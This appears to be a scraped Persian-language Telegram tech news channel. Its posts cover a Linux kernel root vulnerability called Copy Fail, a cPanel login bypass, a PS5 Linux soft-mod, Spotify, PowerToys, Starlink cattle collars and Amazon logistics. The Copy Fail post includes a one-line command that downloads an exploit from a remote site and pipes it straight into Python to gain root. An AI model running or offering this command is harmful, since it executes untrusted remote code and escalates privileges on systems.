This media is not supported in your browser
VIEW IN TELEGRAM
هوش مصنوعی جمنای از حالا میتونه فایلهای مختلف از جمله PDF، ورد، اکسل، فایلهای متنی و غیره براساس موضوع مدنظرتون بسازه تا بتونین اونهارو به راحتی دانلود کنید.
🔎 GeminiApp
📍 @TechTube
🔎 GeminiApp
📍 @TechTube
❤🔥59💔15❤9🔥6
محقق شرکت امنیتی Theori با کمک پلتفرم تست نفوذ با هوش مصنوعی Xint موفق شده حفره امنیتی خطرناکی در هسته لینوکس رو کشف کنه که به هر فایل اجرایی امکان گرفتن دسترسی روت روی تقریبا هر توزیع لینوکسی رو فراهم میکنه!
این حفره موسوم به Copy Fail با کد CVE-2026-31431 به دلیل باگی در سیستم کش فایل هسته لینوکس به وجود اومده که با دستکاری باینری کش شده setuid-root میتونه دسترسی روت دریافت کنه و کل سیستم رو کنترل کنه و مخفی بمونه. حتی در برخی حالات امکان دسترسی به هاست از داخل یک کانتینرها هم میتونه ممکن باشه!
این باگ تقریبا روی هر توزیعی که از هسته لینوکسِ عرضه شده از سال ۲۰۱۷ تاکنون استفاده میکنه، قابل اجرا هست و روی توزیعهایی مثل Ubuntu، SUSE، RHEL و غیره تست شده.
برای استفاده از اون فقط کافیه یک فایل ۷۳۲ بایتی پایتون رو اجرا کرد تا در کسری از ثانیه روی سیستمی با یوزر عادی، دسترسی روت بگیره. کدهای اون هم با بقیه زبانها از جمله Go هم پیادهسازی شدن. برای تست راحت اون (که نیاز به اینترنت برای دریافت کدها داره) میتونید از دستور زیر استفاده کنید:
در حال حاضر این باگ در آپدیت جدید هسته لینوکس اصلاح شده ولی فقط توزیعهای مبتنی بر ارچ این آپدیت رو اعمال کردن و توزیعهای دیگه از جمله اوبونتو، دبیان و فدورا همچنان در حال رفع این باگ هستن.
🔎 xint
📍 @TechTube
این حفره موسوم به Copy Fail با کد CVE-2026-31431 به دلیل باگی در سیستم کش فایل هسته لینوکس به وجود اومده که با دستکاری باینری کش شده setuid-root میتونه دسترسی روت دریافت کنه و کل سیستم رو کنترل کنه و مخفی بمونه. حتی در برخی حالات امکان دسترسی به هاست از داخل یک کانتینرها هم میتونه ممکن باشه!
این باگ تقریبا روی هر توزیعی که از هسته لینوکسِ عرضه شده از سال ۲۰۱۷ تاکنون استفاده میکنه، قابل اجرا هست و روی توزیعهایی مثل Ubuntu، SUSE، RHEL و غیره تست شده.
برای استفاده از اون فقط کافیه یک فایل ۷۳۲ بایتی پایتون رو اجرا کرد تا در کسری از ثانیه روی سیستمی با یوزر عادی، دسترسی روت بگیره. کدهای اون هم با بقیه زبانها از جمله Go هم پیادهسازی شدن. برای تست راحت اون (که نیاز به اینترنت برای دریافت کدها داره) میتونید از دستور زیر استفاده کنید:
curl https://copy.fail/exp | python3 && su
در حال حاضر این باگ در آپدیت جدید هسته لینوکس اصلاح شده ولی فقط توزیعهای مبتنی بر ارچ این آپدیت رو اعمال کردن و توزیعهای دیگه از جمله اوبونتو، دبیان و فدورا همچنان در حال رفع این باگ هستن.
🔎 xint
📍 @TechTube
❤34😱24🔥2💔1😭1🙈1
شرکت امنیتی watchtowr اسیب پذیری روز صفری رو در پنل مدیریت هاست cPanel کشف کرده که به مهاجم بدون نیاز به لاگین، امکان دسترسی به پنل هاست، تنظیمات سرور و دیتابیسهارو فراهم میکنه!
این اسیب پذیری با کد CVE-2026-41940 و میزان خطر 9.8 از 10 شناخته شده و به دلیل باگی در سیستم پردازش سشنهای cPanel و با دستکاری کوکیها از جانب مهاجم، به اون امکان گذر از سد لاگین رو میده.
برای اصلاح این اسیب پذیری خطرناک، cPanel اپدیتهایی رو عرضه کرده و هر نسخه ای قبل از این نسخه ها، دارای این اسیب پذیری هست:
شرکت Cloudflare هم برای سایتهایی که از CDN این شرکت استفاده میکنن، اقداماتی برای جلوگیری از حمله در سمت خودش، تا زمان اپدیت شدن سرورها، انجام داده.
پنل cPanel توسط میلیونها وب سایت از جمله بسیاری از هاستهای ایرانی استفاده میشه و متاسفانه به دلیل قطعی اینترنت خیلی از اونها امکان اپدیت کردن به این نسخه ندارن!
🔎 rapid7
📍 @TechTube
این اسیب پذیری با کد CVE-2026-41940 و میزان خطر 9.8 از 10 شناخته شده و به دلیل باگی در سیستم پردازش سشنهای cPanel و با دستکاری کوکیها از جانب مهاجم، به اون امکان گذر از سد لاگین رو میده.
برای اصلاح این اسیب پذیری خطرناک، cPanel اپدیتهایی رو عرضه کرده و هر نسخه ای قبل از این نسخه ها، دارای این اسیب پذیری هست:
11.86.0.41
11.110.0.97
11.118.0.63
11.126.0.54
11.130.0.19
11.132.0.29
11.136.0.5
11.134.0.20
شرکت Cloudflare هم برای سایتهایی که از CDN این شرکت استفاده میکنن، اقداماتی برای جلوگیری از حمله در سمت خودش، تا زمان اپدیت شدن سرورها، انجام داده.
پنل cPanel توسط میلیونها وب سایت از جمله بسیاری از هاستهای ایرانی استفاده میشه و متاسفانه به دلیل قطعی اینترنت خیلی از اونها امکان اپدیت کردن به این نسخه ندارن!
🔎 rapid7
📍 @TechTube
💔40😈6❤2❤🔥1
مایکروسافت در اپدیت جدید مجموعه ابزارهای کاربردی PowerToys امکان کنترل نمایشگر رو با ابزار Power Display اضافه کرده و کاربران از طریق اون میتونن روشنایی، کنتراست و ورودی تصویر مانیتورشون رو بدون نیاز به دستکاری تنظیمات از طریق دکمه های فیزیکی مانیتور، تغییر بدن.
این اپدیت جدید از طریق گیتهاب برای ویندوز 10 و 11 قابل دانلود هست.
🔎 microsoft.com
📍 @TechTube
این اپدیت جدید از طریق گیتهاب برای ویندوز 10 و 11 قابل دانلود هست.
🔎 microsoft.com
📍 @TechTube
❤🔥42🌭15❤4⚡3💔2
بزرگترین چالش زمان قطعی اینترنت، بیخبری، کماطلاعی و جولان دادن کلاهبردارهاست!
نوشدارو شما رو آگاه و در جریان نگه میداره:
- شناخت ترفندهای کلاهبردارها و هکرها
- نکات امنیتی محافظت از حریم شخصی در زمان قطعی
- روشهای مراقبت از سلامت روان خود و کودکان
- اخبار هوش مصنوعی
@Nooshdaroo_Web
@Nooshdaroo_Web
نوشدارو شما رو آگاه و در جریان نگه میداره:
- شناخت ترفندهای کلاهبردارها و هکرها
- نکات امنیتی محافظت از حریم شخصی در زمان قطعی
- روشهای مراقبت از سلامت روان خود و کودکان
- اخبار هوش مصنوعی
@Nooshdaroo_Web
@Nooshdaroo_Web
🍌22👏12🌭11❤4
سرویس استریم موزیک اسپاتیفای در آپدیتهای اخیرش بالأخره امکان دیدن متن آهنگها رو در حالت آفلاین هم مهیا کرده و کاربران پریمیوم در هنگام قطعی اینترنت میتونن متن آهنگهایی که قبلا دانلود کردن رو هم ببینن.
علاوه بر این اسپاتیفای قابلیت ترجمه متن آهنگها، که پیش از این در کشورهای معدودی عرضه شده بود، رو حالا برای تمام کاربران جهان فعال کرده.
همچنین در طراحی جدید اسپاتیفای، خطی از متن آهنگ که خواننده اون رو میخونه، حالا زیر کاور و بالای عنوان آهنگ نمایش داده میشه که دیدن متن آهنگ رو راحتتر میکنه. این قابلیت هم برای تمام کاربران در دسترس هست.
🔎 techcrunch
📍 @TechTube
علاوه بر این اسپاتیفای قابلیت ترجمه متن آهنگها، که پیش از این در کشورهای معدودی عرضه شده بود، رو حالا برای تمام کاربران جهان فعال کرده.
همچنین در طراحی جدید اسپاتیفای، خطی از متن آهنگ که خواننده اون رو میخونه، حالا زیر کاور و بالای عنوان آهنگ نمایش داده میشه که دیدن متن آهنگ رو راحتتر میکنه. این قابلیت هم برای تمام کاربران در دسترس هست.
🔎 techcrunch
📍 @TechTube
1🤣54❤26🌭8👌6💔5❤🔥3🍌3😭3👏2
یک محقق امنیتی موفق شده روی کنسول پلیاستیشن ۵ لینوکس نصب کنه و بدین واسطه بازیهای مختلف کامپیوتر رو روی اون اجرا کنه!
این امکان به لطف یک آسیبپذیری در فریمور PS5 ممکن شده و دارندگان PS5 با فریمور قدیمی نسخه ۳ تا ۴ میتونن از این روش روی کنسولشون لینوکس نصب کنن. افرادی که به نسخه ۵ به بالا آپدیت کردن امکان استفاده از این روش رو ندارن.
این روش از نوع soft mod هست، بنابراین با ریستارت کردن یا خاموش کردن دستگاه از بین میره و دستگاه به حالت عادی برمیگرده. علاوه بر این استفاده از اون مشکلی برای دستگاه به وجود نمیاره.
مراحل نصب لینوکس روی PS5 در اینجا توضیح داده شده که فقط روی PS5 دیسکخور کار میکنه و به یک فلش یا هارد اکسترنال حداقل ۶۴ گیگی، یک دانگل USB شبکه یا وایفای، یه کیبورد و ماوس USB نیاز داره و برای اجرای این روش به کامپیوتری با سیستم عامل ویندوز، لینوکس یا مک هم نیاز هست.
بعد از نصب کاربران میتونن روی PS5 توزیعهایی مثل ابونتو بریزن و بازیهای مختلف کامپیوتر مثلا بازیهای کرکی یا بازیهای استیم رو روی کنسولشون اجرا کنن. در تستهای انجام شده کاربران موفق شدن بازیهایی مثل GTA V رو با ریتریسینگ و 60FPS و Spider-Man رو با رزولوشن 1440p@60FPS اجرا کنن. علاوه بر این امکان اجرای بازیهای کنسولهای مختلف از نینتندو سوییچ هم از طریق شبیهساز وجود داره.
همونجور که گفته شد این روش بعد از خاموش کردن یا ریستارت کردن دستگاه از بین میره و سازنده این روش در تلاش هست تا حالت Rest Mode رو برای لینوکس روی این کنسول هم بیاره تا بشه کنسول رو در وقت بیکاری به حالت کم مصرف منتقل کرد و برای استفاده مجدد از لینوکس اون رو به راحتی روشن کرد.
🔎 theverge
📍 @TechTube
این امکان به لطف یک آسیبپذیری در فریمور PS5 ممکن شده و دارندگان PS5 با فریمور قدیمی نسخه ۳ تا ۴ میتونن از این روش روی کنسولشون لینوکس نصب کنن. افرادی که به نسخه ۵ به بالا آپدیت کردن امکان استفاده از این روش رو ندارن.
این روش از نوع soft mod هست، بنابراین با ریستارت کردن یا خاموش کردن دستگاه از بین میره و دستگاه به حالت عادی برمیگرده. علاوه بر این استفاده از اون مشکلی برای دستگاه به وجود نمیاره.
مراحل نصب لینوکس روی PS5 در اینجا توضیح داده شده که فقط روی PS5 دیسکخور کار میکنه و به یک فلش یا هارد اکسترنال حداقل ۶۴ گیگی، یک دانگل USB شبکه یا وایفای، یه کیبورد و ماوس USB نیاز داره و برای اجرای این روش به کامپیوتری با سیستم عامل ویندوز، لینوکس یا مک هم نیاز هست.
بعد از نصب کاربران میتونن روی PS5 توزیعهایی مثل ابونتو بریزن و بازیهای مختلف کامپیوتر مثلا بازیهای کرکی یا بازیهای استیم رو روی کنسولشون اجرا کنن. در تستهای انجام شده کاربران موفق شدن بازیهایی مثل GTA V رو با ریتریسینگ و 60FPS و Spider-Man رو با رزولوشن 1440p@60FPS اجرا کنن. علاوه بر این امکان اجرای بازیهای کنسولهای مختلف از نینتندو سوییچ هم از طریق شبیهساز وجود داره.
همونجور که گفته شد این روش بعد از خاموش کردن یا ریستارت کردن دستگاه از بین میره و سازنده این روش در تلاش هست تا حالت Rest Mode رو برای لینوکس روی این کنسول هم بیاره تا بشه کنسول رو در وقت بیکاری به حالت کم مصرف منتقل کرد و برای استفاده مجدد از لینوکس اون رو به راحتی روشن کرد.
🔎 theverge
📍 @TechTube
💯77⚡11🔥9🤣6👏3🌭3🍌3🆒1👾1
اکانت Gemini Pro
(اختصاصی)روی ایمیل شخصی شما بدون ورود
پرداخت امن با درگاه پرداخت
همین حالا ارتقا دهید
لینک خرید از وب سایت:
لینک چنل:
Please open Telegram to view this post
VIEW IN TELEGRAM
🌭29❤🔥12🤣6⚡2🔥2💔2😁1🍌1
شرکت نیوزلندی Halter امکان اتصال گاوها به استارلینک رو ممکن کرده!
این شرکت قلادههای هوشمندی میسازه که همانند گوشیها، امکان اتصال به ماهوارههای استارلینک از طریق تکنولوژی Direct To Cell رو دارن و به دامداران امکان پایش موقعیت گاوهاشون در هر مکانی رو مهیا میکنن.
تا پیش از این دامداران برای پایش گاوهاشون از طریق قلادههای Halter نیازمند آنتن ۴۵۰۰ دلاری بودن که ۸ کیلومتر رو پوشش میداد ولی با استارلینک دیگه نیازی به این آنتنها نیست و تقریبا هر منطقهای رو بدون نیاز به سختافزار اضافه پوشش میده.
علاوه بر پایش موقعیت، قلادههای Halter امکان حصار مجازی هم دارن و دامداران میتونن منطقه مجاز برای چرای گاوها رو مشخص کنن و اگر گاوی از اون منطقه خارج شد، در وهله اول این قلادهها صدایی رو پخش میکنن تا گاو رو از اون مسیر منحرف کنن و اگر گاو به اون صدا واکنشی نشون نداد، یک پالس الکتریکی ضعیف به گاو وارد میشه تا مسیرش رو منحرف کنه.
🔎 pcmag
📍 @TechTube
این شرکت قلادههای هوشمندی میسازه که همانند گوشیها، امکان اتصال به ماهوارههای استارلینک از طریق تکنولوژی Direct To Cell رو دارن و به دامداران امکان پایش موقعیت گاوهاشون در هر مکانی رو مهیا میکنن.
تا پیش از این دامداران برای پایش گاوهاشون از طریق قلادههای Halter نیازمند آنتن ۴۵۰۰ دلاری بودن که ۸ کیلومتر رو پوشش میداد ولی با استارلینک دیگه نیازی به این آنتنها نیست و تقریبا هر منطقهای رو بدون نیاز به سختافزار اضافه پوشش میده.
علاوه بر پایش موقعیت، قلادههای Halter امکان حصار مجازی هم دارن و دامداران میتونن منطقه مجاز برای چرای گاوها رو مشخص کنن و اگر گاوی از اون منطقه خارج شد، در وهله اول این قلادهها صدایی رو پخش میکنن تا گاو رو از اون مسیر منحرف کنن و اگر گاو به اون صدا واکنشی نشون نداد، یک پالس الکتریکی ضعیف به گاو وارد میشه تا مسیرش رو منحرف کنه.
🔎 pcmag
📍 @TechTube
1🤣155👏27💔21😭13😐6😱5🤬3❤🔥2🌭1👨💻1🙈1
Forwarded from جادی | Jadi
این مساله کپی فیل اینقدر مهم بود که فکر کردم سعی کنم کاملا فنی توضیحش بدم. ویدئو سه تا مفهومی که باعث شدن در ترکیبشون بشه یه یوزر معمولی دسترسی روت بگیره رو توضیح می ده. جالبیش هم اینه که هر سه تا مفهوم، منطقی و معقول هستن ولی ترکیبشون باعث شده بشه چنین حمله ای درست کرد!
https://youtu.be/0GUEoWEDqlo
https://youtu.be/0GUEoWEDqlo
YouTube
نوشتن ۴ بایت روی فایلهای سیستمی که امنیت کرنل لینوکس رو در هم کوبید - توضیح فنی Copy Fail
درسته که من لینوکس رو خیلی دوست دارم ولی وقتی باگ های حاد داره بهترین وقت است برای یه گپ فنی عمیق. چند روز قبل یه باگ لوکال منتشر شد که هر یوزری با داشتن دستوری حداقلی می تونست خودش رو به روت تبدیل کنه. این مشکل ناشی از «یک باگ» نبود بلکه محصول وصل کردن سه…
❤🔥10🌚3🍌1
جادی | Jadi
این مساله کپی فیل اینقدر مهم بود که فکر کردم سعی کنم کاملا فنی توضیحش بدم. ویدئو سه تا مفهومی که باعث شدن در ترکیبشون بشه یه یوزر معمولی دسترسی روت بگیره رو توضیح می ده. جالبیش هم اینه که هر سه تا مفهوم، منطقی و معقول هستن ولی ترکیبشون باعث شده بشه چنین حمله…
Please open Telegram to view this post
VIEW IN TELEGRAM
💔26🤣7👌6❤🔥2🌚2🤝2🍓1
شرکت آمازون، بزرگترین فروشگاه خرید آنلاین در جهان که در چند دهه گذشته شبکه عظیم لجستیکی خودش برای تحویل کالا به مشتریانش رو توسعه داده، حالا این امکان رو به شرکتهای مختلف میده تا از این شبکه گسترده برای تحویل مستقیم محصولاتشون به مشتریان استفاده کنن.
آمازون کاری که با سرویس ابری AWS در دو دهه گذشته و تبدیل شدن به بزرگترین ارائه دهنده خدمات ابری انجام داده بود رو حالا قصد داره با سرویس Amazon Supply Chain Services یا ASCS برای زنجیره تأمین کالا هم انجام بده و به شرکتها در هر اندازهای و از مواد اولیه تا محصول نهایی، سرویس حمل و نقل، انبارداری و توزیع، تحویل و ارسال کالا از طریق انبارهای عظیم این شرکت و ناوگان ۸۰ هزار کامیون، ۲۴ هزار کانیتنر، بیش از ۱۰۰ هواپیما و ماشینهای تحویل کالا رو ارائه میده و با غولهای این حوزه نظیر DHL، UPS و FedEx وارد رقابت شده.
در حال حاضر غولهایی همچون Procter & Gamble و 3M و American Eagle مشتری این سرویس شدن.
🔎 cnbc
📍 @TechTube
آمازون کاری که با سرویس ابری AWS در دو دهه گذشته و تبدیل شدن به بزرگترین ارائه دهنده خدمات ابری انجام داده بود رو حالا قصد داره با سرویس Amazon Supply Chain Services یا ASCS برای زنجیره تأمین کالا هم انجام بده و به شرکتها در هر اندازهای و از مواد اولیه تا محصول نهایی، سرویس حمل و نقل، انبارداری و توزیع، تحویل و ارسال کالا از طریق انبارهای عظیم این شرکت و ناوگان ۸۰ هزار کامیون، ۲۴ هزار کانیتنر، بیش از ۱۰۰ هواپیما و ماشینهای تحویل کالا رو ارائه میده و با غولهای این حوزه نظیر DHL، UPS و FedEx وارد رقابت شده.
در حال حاضر غولهایی همچون Procter & Gamble و 3M و American Eagle مشتری این سرویس شدن.
🔎 cnbc
📍 @TechTube
❤🔥24🤯8👌6